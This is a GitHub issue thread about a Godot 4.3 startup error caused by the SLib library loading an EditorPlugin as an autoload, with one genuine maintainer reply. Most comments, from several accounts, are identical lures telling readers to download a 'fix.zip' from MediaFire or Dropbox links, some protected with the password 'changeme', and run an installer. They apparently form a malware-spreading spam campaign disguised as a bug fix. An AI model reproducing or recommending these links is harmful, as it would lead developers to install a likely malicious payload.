### ISSUE TITLE
E 0:00:01:0104   start: Failed to instantiate an autoload, cannot instantiate 'EditorPlugin'.   <C++ Error>    Condition "!obj" is true. Continuing.   <C++ Source>   main/main.cpp:3681 @ start()

### ISSUE THREAD

**Issue by snipercup** [Subject-Team/Subject-Library#12]
**Describe the bug**
I got this error when I start up my game
```
E 0:00:01:0103   _instantiate_internal: Class 'EditorPlugin' can only be instantiated by editor.
  <C++ Source>   core/object/class_db.cpp:521 @ _instantiate_internal()
E 0:00:01:0104   start: Failed to instantiate an autoload, cannot instantiate 'EditorPlugin'.
  <C++ Error>    Condition "!obj" is true. Continuing.
  <C++ Source>   main/main.cpp:3681 @ start()

```
I Think you can't have an editorplugin as an autoload. Is there some way to separate the funcitonality? Why do we need the settings as a editor plugin. Maybe we can keep everything in the SLib.gd script.

**To Reproduce**
Following the install instrucitons:
- Put the SLib.gd and SLibSettings.gd scripts in your project folder
- Enter them as autoloads in project settings
- Start the game, observe error
...

**Expected behavior**
No error

**Screenshots**

**Details (please complete the following information):**
 - OS: Windows10
 - Godot Version: V4.3
 - SLib Version: V1.0.2

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by NimaJafariComp** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Mlecherf** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mkh-user** [comment]
That's right, this is a warning that I strangely didn't get when I checked the last version, but it's showing up now. (probably my mistake)
I fixed it, but considering that we don't have a poll about using SLibSettings, I created an issue [here](https://github.com/Subject-Team/SLib/issues/13) to look into it, please participate so that we can get a result, I don't insist on keeping it, but I think we need default parameters.

remove request: https://github.com/Subject-Team/SLib/issues/13

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
